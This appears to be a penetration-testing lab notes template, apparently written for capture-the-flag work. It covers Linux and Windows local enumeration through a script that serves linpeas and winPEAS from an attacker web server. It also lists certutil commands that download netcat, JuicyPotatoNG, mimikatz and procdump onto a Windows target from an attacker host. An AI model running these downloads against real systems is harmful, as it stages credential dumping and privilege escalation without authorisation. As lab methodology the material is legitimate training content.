#PrivilegeEscalation #flag #LocalEnumeration

## Local Enumeration
{% if OS == "Linux" %}

### Linux

The `simplenum` script will automatically run a web server on the tools folder.
It copy to clipboard the right commands to run on Linux by default or on Windows with the --windows option, the `linpeas.sh` script is used by default :

```bash
simplenum
[*] Linux command requested
[**] Selecting default tool : linpeas.sh
[*] Running web server http://192.168.119.136:80
[**] http://192.168.119.136:80/linpeas.sh copied to clipboard !
[+] Serving /home/yacine/Documents/tools...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.243.152:80
Press CTRL+C to quit
```
{% else %}

The `simplenum` script will automatically run a web server on the tools folder.
It copy to clipboard the right commands to run on Linux on Windows with the --windows option, the `winPEASx64.exe` file is used by default :

```bash
simplenum --windows
[*] Windows command requested
[**] Selecting default tool : winPEASx64.exe
[*] Running web server http://192.168.119.136:80
[**] http://192.168.119.136:80/winPEASx64.exe copied to clipboard !
[+] Serving /home/yacine/Documents/tools...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.243.152:80
Press CTRL+C to quit
```

## Privilege Escalation

```bash
cd C:\Users\Public
certutil -urlcache -f http://$TUN_IP:80/nc.exe nc.exe
certutil -urlcache -f http://$TUN_IP:80/JuicyPotatoNG.exe JuicyPotatoNG.exe
certutil -urlcache -f http://$TUN_IP:80/mimikatz.exe mimikatz.exe
certutil -urlcache -f http://$TUN_IP:80/procdump.exe procdump.exe
```

{% endif %}


## Flag (Linux)
```bash
cat /root/proof.txt
```
